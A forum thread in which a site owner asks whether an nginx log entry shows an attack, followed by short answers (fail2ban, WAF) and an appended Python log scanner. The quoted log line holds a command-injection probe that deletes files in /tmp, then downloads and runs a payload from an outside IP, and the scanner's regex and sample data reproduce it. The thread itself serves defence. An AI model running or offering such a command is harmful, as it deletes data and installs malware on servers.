Nginx
Dmitry, 2020-09-11 23:53:13

Is someone trying to break into my hosting? How can I protect it based on the logs?

Good day!
I saw this line in the logs:

2020/09/11 22:18:18 [error] 1693#1693: *2348 open() "/usr/share/nginx/html/shell" failed (2: No such file or directory), client: 197.56.189.213, server: localhost, request: "GET /shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1", host: "127.0.0.1:80"


Is this a hacking attempt? How do I stop it and identify the source?

4 answer(s)
algiraid, 2020-09-12
@dfsaraev

As an option: close all unnecessary ports and install an antivirus with anti-malware. Configure cron to clean up unneeded folders every 5 seconds. Honeypot when it detects GET requests from new clients. Fail2ban. And regular security audits in paranoia mode.
P.S. You're lucky: only one entry. When they tried to hack the site, there were 60 attempts in the hoster's logs. Yandex saw 20 visits.

Sergey Gornostaev, 2020-09-12
@sergey-gornostaev

fail2ban

Andrey Gavrilov, 2020-09-12
@thexaver

WAF
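
Added example (not part of the thread or of any answer above): a small Python scan of nginx error-log lines that URL-decodes each request and flags shell-command chaining like the entry in the question, counting hits per client address as candidates for a fail2ban or WAF rule. The injection pattern is an assumed heuristic to tune per site; the first sample line is copied from the question, the other two are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Fields of interest in an nginx error-log entry: client address and request URI.
LINE_RE = re.compile(
    r'client: (?P<client>[0-9a-fA-F.:]+), .*?request: "(?P<method>[A-Z]+) (?P<uri>\S+)'
)

# Heuristic (assumption): a shell separator followed by a download, permission,
# delete or interpreter command and whitespace, inside the decoded URI.
INJECTION_RE = re.compile(
    r'(?:;|\||&&|`|\$\()\s*(?:wget|curl|tftp|chmod|sh|bash|rm)\s', re.I
)

SAMPLE_LOG = [
    # Copied from the question.
    '2020/09/11 22:18:18 [error] 1693#1693: *2348 open() "/usr/share/nginx/html/shell" '
    'failed (2: No such file or directory), client: 197.56.189.213, server: localhost, '
    'request: "GET /shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;'
    'chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1", '
    'host: "127.0.0.1:80"',
    # Constructed: ordinary 404 for a missing file.
    '2020/09/11 22:20:01 [error] 1693#1693: *2350 open() "/usr/share/nginx/html/favicon.ico" '
    'failed (2: No such file or directory), client: 203.0.113.7, server: localhost, '
    'request: "GET /favicon.ico HTTP/1.1", host: "example.test"',
    # Constructed: benign query string whose parameter happens to be named "sh".
    '2020/09/11 22:21:40 [error] 1693#1693: *2351 open() "/usr/share/nginx/html/search" '
    'failed (2: No such file or directory), client: 198.51.100.9, server: localhost, '
    'request: "GET /search?q=nginx&sh=1 HTTP/1.1", host: "example.test"',
]

def find_probes(lines):
    """Return a Counter mapping client address -> number of injection-like requests."""
    hits = Counter()
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not an entry that carries a client and a request
        decoded = unquote_plus(m.group("uri"))  # '+' and %xx hide spaces and separators
        if INJECTION_RE.search(decoded):
            hits[m.group("client")] += 1
    return hits

if __name__ == "__main__":
    for client, count in find_probes(SAMPLE_LOG).most_common():
        print(f"{client}\t{count} injection-like request(s)")
```

The same 404 entry shows that nginx found no `/shell` file to serve, so the value of the scan is in identifying which clients to rate-limit or ban rather than in confirming a compromise.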
